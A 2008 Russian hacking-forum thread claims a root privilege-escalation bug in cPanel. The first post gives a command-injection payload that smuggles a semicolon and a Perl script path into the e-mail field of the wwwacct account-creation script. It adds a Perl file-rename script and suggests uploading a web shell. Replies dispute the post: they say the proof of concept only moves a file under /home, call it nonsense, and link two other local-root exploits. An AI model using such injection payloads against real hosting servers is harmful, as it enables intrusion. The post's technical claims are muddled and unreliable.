ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Cpanel all versions.
  #1  
Старый 19.06.2008, 20:11
Аватар для КВР
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086

Репутация: 135
По умолчанию Cpanel all versions.

Cpanel



Версия:
все

риск: очень высокий

Этот баг может привести к поднятию привелегий до рута

Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт

официальный сайт: Cpanel.net

[code]

Как это работает?

Что происходит когда ты создаёш аккаунт ?

./script/wwwact [domainname] [username] [password] [Email address] lab lab lab

Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086)

К примеру:

http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab

iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t)

так ты можеш выполнять любые команды, к примеру

./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)


()()()()()()()()()()()()()

Проверим:

++++++++++++++++++++++++++

Шаг первый

сохроните в фаил /home/user/public_html/do.pl .

#!/usr/bin/perl

$old='/home/user/public_html/test.txt';

$new='/home/root/kon.txt';

rename $old, $new;

++++++++++++++++++++++++++

Шаг второй

пазовите фаил test.txt в твоей public_html директории.

path will be : /home/user/public_html/test.txt .

++++++++++++++++++++++++++

Шаг третий

создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box

и нажмите нопку создать.

Теперь ты сможеш видеть /home/root/ .

++++++++++++++++++++++++++

()()()()()()()()()()()()()

Ты можеш выполнить и ваш собственный код !Залить шелл и тп.

Последний раз редактировалось КВР; 19.06.2008 в 20:29..
 
Ответить с цитированием

  #2  
Старый 04.07.2008, 19:01
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

эээ... ты просто переименовал каталог... а рутовый каталог вообще то находится по адресу /root
а "багу" ты сам нашел? или взял откуда то? потому что то что ты тут описал тебе абсолютно не даст...
 
Ответить с цитированием

  #3  
Старый 05.07.2008, 16:39
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Сам понял, чего написал-то? Я знаю две local root уязвимости для CPanel:

http://www.milw0rm.com/exploits/2466

http://www.milw0rm.com/exploits/2554

Но это по-ходу не они...

КВР, ответь на вопрос: у тебя самого это где-нибудь работало?
 
Ответить с цитированием

  #4  
Старый 05.07.2008, 17:02
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

ты посмотри что он делает.. он переименовывает каталог из /home/user в /home/root.. это ему ничего не даст так как рутовый каталог лежит по адресу /root а не /home/root.. поэтому все что тут описано на мой взгляд является полнейшим бредом
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор: уязвимости cPanel ] Solide Snake Сценарии/CMF/СMS 11 22.11.2008 18:41
Multi Password Recovery Killerkod Soft - Windows 14 28.09.2008 15:38
Cpanel Password Brute Forcer PandoraBox PHP, PERL, MySQL, JavaScript 1 10.12.2007 14:58
cpanel dyx Болталка 1 23.06.2005 14:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ